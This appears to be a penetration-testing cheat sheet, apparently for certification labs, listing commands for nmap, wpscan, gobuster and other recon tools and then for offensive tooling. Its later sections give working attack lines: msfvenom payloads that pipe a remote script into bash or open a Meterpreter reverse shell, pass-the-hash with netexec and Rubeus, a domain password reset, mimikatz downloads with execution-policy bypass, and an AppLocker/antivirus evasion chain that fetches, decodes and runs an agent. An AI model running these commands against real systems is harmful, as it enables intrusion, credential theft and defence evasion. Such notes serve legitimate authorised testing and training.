# Tools
# autorecon
# Basic usage
```bash
autorecon TARGET_IP
```
Scanning multiple hosts
```bash
autorecon -t targets.txt
#or the below
sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv
```
# nmap
### Base Syntax
```bash
nmap {Targets} [ScanType] [Options]
```
### Target
| Purpose | Example |
|---|
| 1 target | `nmap IP` |
| scan multiple targets | `nmap IP1, IP2, IP3` |
| scan a list | `nmap -iL list.txt` |
| scan CIDR range | `nmap 192.168.1.0/24` |
### Ports
| Purpose | Example |
|---|
| Scan top 1k popular ports | `nmap IP` |
| Port range | `nmap -p x-y` |
| Port list | `nmap -p x,y,z` |
| linear portrange | `nmap -r x-y` |
### Probing
| Purpose | Example |
|---|
| Don't probe | `nmap IP -Pn` |
| Default probe | `nmap IP -PB` |
| ICMP Echo Request | `nmap IP -PE` |
| ICMP Timestamp Request | `nmap IP -PP` |
| ICMP Network Request | `nmap IP -PM` |
### Scan Type
| Purpose | Example |
|---|
| Probe only | `nmap IP -sn` |
| SYN Scan | `nmap IP -sS` |
| TCP Connect Scan | `nmap IP -sT` |
| UDP Scan | `nmap IP -su` |
| Version scan | `nmap IP -sV` |
| OS Detection | `nmap IP -PM` |
| Set TCP flags | `nmap IP --scanflags: x,y,z` |
### Timing Options
| Purpose | Example |
|---|
| Paranoid | `nmap IP -T0` |
| Sneaky | `nmap IP -T1` |
| Polite | `nmap IP -T2` |
| Normal | `nmap IP -T3` |
| Aggressive | `nmap IP -T4` |
| Insane | `nmap IP -T5` |
### Output Format
| Purpose | Example |
|---|
| Standard | `nmap IP -oN file.txt` |
| Greppable | `nmap IP -oG file.txt` |
| XML | `nmap IP -oX file.txt` |
| all formats | `nmap IP -oA file` |
### Misc Options
| Purpose | Example |
|---|
| Aggresive scan | `nmap IP -A` |
| nmap reason why a port is in a state | `nmap IP --reason` |
# wpscan
# Basic usage
```bash
wpscan --url http://TARGET_IP
```
Scan for plugins
```bash
wpscan --url http://TARGET_IP -e p
```
Scan for users
```bash
wpscan --url http://TARGET_IP -e u
```
Scan for vulnerable plugins
```bash
wpscan --url http://TARGET_IP -e vp
```
Brute force passwords
```bash
wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt
```
# fuff
# Basic Usage
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ
```
# nikto
# Basic usage
```bash
nikto -host http://TARGET_IP -p PORT
```
# gobuster
# Basic usage
```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
```
Enumerating with extensions (filter the extension based on target)
```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx
```
Enumerating vhosts (after updating `/etc/hosts`
```bash
gobuster vhost -u -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --ad
```
# netexec
# Enumeration
## SMB
```powershell
netexec smb targets.txt -u user_name -H 'NTLM_HASH'
```
```powershell
netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol
```
## winrm
```powershell
netexec winrm targets.txt -u user_name -H 'NTLM_HASH'
```
# powerview
### 1. Enumerate common names
```powershell
Get-DomainComputer | select cn
```
# msf
# Linux payloads
## With commands
```powershell
msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf
```
# Windows
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c
```
Catch with
```bash
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j"
```
# rubeus
```powershell
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
```
# powersploit
Reset a user’s password
```powershell
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword
```
# mimikatz
You will need to first upload the binaries to the target, either via a meterpreter shell or powershell:
## meterpreter
```bash
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
```
## powershell
```powershell
powershell -ep bypass -c iwr YOUR_IP/mimikatz.exe -o .\\mimikatz.exe
powershell -ep bypass -c iwr YOUR_IP/mimidrv.sys -o .\\mimidrv.sys
```
# ligolo-ng
You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM.
```powershell
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```
# Basic tunnel
1. start `ligolo-proxy`
```powershell
sudo ligolo-proxy -selfcert
```
1. Connect the agent
2. enter session and list network configuration
```powershell
#in ligolo-ng
sessions
ifconfig
```
3. set route
1. 1 hop
```powershell
autoroute
start
```
2. 2 hops
## AV evasion
1. Clone the repository
```powershell
git clone https://github.com/nicocha30/ligolo-ng.git
```
2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file `/ligolo-ng/cmd/agent/main.go`
3. Compile the `agent.exe` using the following command
```bash
GOOS=windows go build -o agent.exe cmd/agent/main.go
```
4. Compile as `x64` and give the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary)
5. Encode the file created above with certutil
```powershell
certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
```
6. Rename the `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`
8. Upload the files to the target
```powershell
cmd.exe /c curl http:/YOUR_IP/ligolo-agent.exe -o C:\\users\\public\\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\\users\\public\\enc.txt && certutil -decode C:\\users\\public\\enc.txt C:\\users\\public\\ligolo.exe && del C:\\users\\public\\enc.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /U C:\\users\\public\\ligolo.exe
```